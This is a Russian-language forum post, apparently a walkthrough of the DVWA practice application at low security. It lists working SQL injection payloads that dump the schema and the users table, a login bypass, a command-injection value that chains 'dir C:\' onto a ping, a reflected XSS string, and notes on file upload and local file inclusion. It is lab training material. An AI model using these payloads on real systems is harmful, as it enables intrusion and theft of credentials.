Показать сообщение отдельно

  #10  
Старый 08.12.2009, 19:31
Nik(rus)
Познающий
Регистрация: 19.06.2009
Сообщений: 34
С нами: 8891773

Репутация: 10
По умолчанию

Вот как я ломал

1.Low SQL-Inj
Код:
-1' UNION SELECT concat_ws(0x3A,user(),version(),database()),'ololo sql :D'/*
Узнаем инфу, дальше:
Код:
-1' UNION SELECT table_name,'table' FROM information_schema.tables WHERE table_schema='dvwa'/*
Тут узнали таблицы, дальше:
Код:
-1' UNION SELECT column_name,'column' FROM information_schema.columns WHERE table_schema='dvwa'/*
Так узнаем колонки, и наконец:
Код:
-1' UNION SELECT concat_ws(0x3A,user_id,first_name,last_name,user,password,avatar),concat('info about ',first_name,' aka ',user) FROM users/*
Юзверята
2. Low Brute
Тут 2 пути:
1) Через скулю (это вооонтам наверху) достаем хэши, брутим на hashcracking,gdataonline, md5.rednoise etc, благо пароли слабые
2)
Код:
Логин: admin' /*
Пасс: ололо админ школота
Ну и угадайте что происходит
3. Low Command Execution
Код:
127.0.0.1 && dir C:\
Наблюдаем пинг 127.0.0.1 и листинг диска C:\
4. Low Upload
Код:
No comments aka тупо льем
5. Low File Inclusion
Код:
http://site/fi_content.php
=> инклудит файлы из корня

Тут видно, что есть связка - LFI и Upload Vuln, берем сканер по хеадерам и сканим известные диры aka up, upload, uploads и находим uploads с прямым листингом
6. XSS
Код:
</pre><script>alert('xss :D')</script><pre>some HaCkEr
Видим тупую XSS
7. BONUS:
в медиум SQL-Inj:
Код:
-1 UNION SELECT concat_ws(0x3A,user(),version(),database()),2/*
Вот такие пироги

С последующими уровнями становится больше и больше фильтров, но как говорится на каждый замок - своя отмычка
 
Ответить с цитированием